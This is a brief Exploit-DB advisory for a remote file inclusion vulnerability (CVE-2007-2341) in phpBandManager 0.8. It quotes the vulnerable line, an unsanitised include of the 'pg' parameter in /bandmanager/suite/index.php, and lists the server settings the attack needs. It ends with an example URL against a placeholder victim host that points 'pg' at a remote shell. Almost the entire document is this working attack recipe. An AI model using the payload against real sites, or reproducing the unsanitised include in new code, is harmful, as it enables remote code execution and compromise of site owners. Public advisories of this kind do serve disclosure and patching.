phpBandManager 0.8 index.php pg Remote File Inclusion Vulnerability

2007-04-26T00:00:00
ID EDB-ID:3802
Type exploitdb
Reporter koray
Modified 2007-04-26T00:00:00

Description

phpBandManager 0.8 (index.php pg) Remote File Inclusion Vulnerability. CVE-2007-2341. Webapps exploit for php platform

                                        
                                            author:koray
greetz:cigicigi.net
script:http://sourceforge.net/projects/phpbandmanager

allow_url_fopen:on or register_globals:on

vuln;

/bandmanager/suite/index.php

include($_GET['pg'].".php");

example;

http://www.victim.com/suite/index.php?pg=shell link?

# milw0rm.com [2007-04-26]